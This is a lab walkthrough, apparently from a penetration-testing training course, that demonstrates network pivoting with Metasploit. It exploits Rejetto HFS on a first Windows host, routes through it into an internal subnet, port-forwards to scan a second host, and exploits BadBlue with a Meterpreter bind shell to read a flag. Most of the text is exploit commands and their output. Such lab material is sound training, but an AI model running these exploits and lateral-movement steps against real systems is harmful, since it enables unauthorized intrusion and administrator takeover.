Pivoting

Pivoting

🔬 Pivoting

• Target 1 IP: 10.2.30.252

• Target 2 IP: 10.2.21.166

• Pivoting technique with a network route to the internal network's subnet

ping 10.2.30.252
    PING 10.2.30.252 (10.2.30.252) 56(84) bytes of data.
    64 bytes from 10.2.30.252: icmp_seq=1 ttl=125 time=2.25 ms
    64 bytes from 10.2.30.252: icmp_seq=2 ttl=125 time=1.99 ms

ping 10.2.21.166
	PING 10.2.21.166 (10.2.21.166) 56(84) bytes of data.
# No response from target2

service postgresql start && msfconsole -q

db_status
workspace -a Pivoting
db_nmap -sV 10.2.30.252

#Exploitation

search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
options
set RHOSTS 10.2.30.252
run

sysinfo
    Computer        : WIN-OMCNBKR66MN
    OS              : Windows 2012 R2 (6.3 Build 9600).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows

getuid
	Server username: WIN-OMCNBKR66MN\Administrator

ipconfig
    Interface  1
    ============
    Name         : Software Loopback Interface 1
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 4294967295
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

    Interface 12
    ============
    Name         : AWS PV Network Device #0
    Hardware MAC : 02:2a:6e:86:47:fc
    MTU          : 9001
    IPv4 Address : 10.2.30.252 #
    IPv4 Netmask : 255.255.240.0
    IPv6 Address : fe80::9c0b:f00a:d8b4:f04f
    IPv6 Netmask : ffff:ffff:ffff:ffff::

    Interface 24
    ============
    Name         : Microsoft ISATAP Adapter #2
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 1280
    IPv6 Address : fe80::5efe:a02:1efc
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

• Target2 is on the same Target1 subnet - 10.2.16.0/20 (look at the Interface 12)

  • 10.2.16.0/20 = from 10.2.16.1 to 10.2.31.254

#Pivoting

• From the attacker's machine, a route through "target1 10.2.30.0/20 machine" is needed, to run MSF modules against target2 machine

run autoroute -s 10.2.30.0/20

• Now, subnet 10.2.30.0/20 can be accessed with MSFconsole

background
sessions -n target-1 -i 1

• Scan for open ports on the target2 system - 10.2.21.166

search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.2.21.166
set PORTS 1-100
run

• 📌 The route is only applicable to MSFconsole, not outside of it

#Port Forwarding

• To perform an nmap scan on target2, a port forwarding need to be set up.

  • e.g. forward the remote port 80 to an attacker machine local port, which will allow to perform a service version enumeration of the target2 service

sessions 1

portfwd add -l 1234 -p 80 -r 10.2.21.166
	[*] Local TCP relay created: :1234 <-> 10.2.21.166:80

background

db_nmap -sS -sV -p 1234 localhost

http://localhost:1234/

search badblue
use exploit/windows/http/badblue_passthru
set payload windows/meterpreter/bind_tcp
set RHOSTS 10.2.21.166
set LPORT 4433
run

Target2 exploited

sysinfo
    Computer        : ATTACKDEFENSE
    OS              : Windows 2016+ (10.0 Build 17763).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows

getuid
	Server username: ATTACKDEFENSE\Administrator

background
sessions -n target-2 -i 2

sessions 2
shell
cd /
type flag.txt

Reveal Flag: 🚩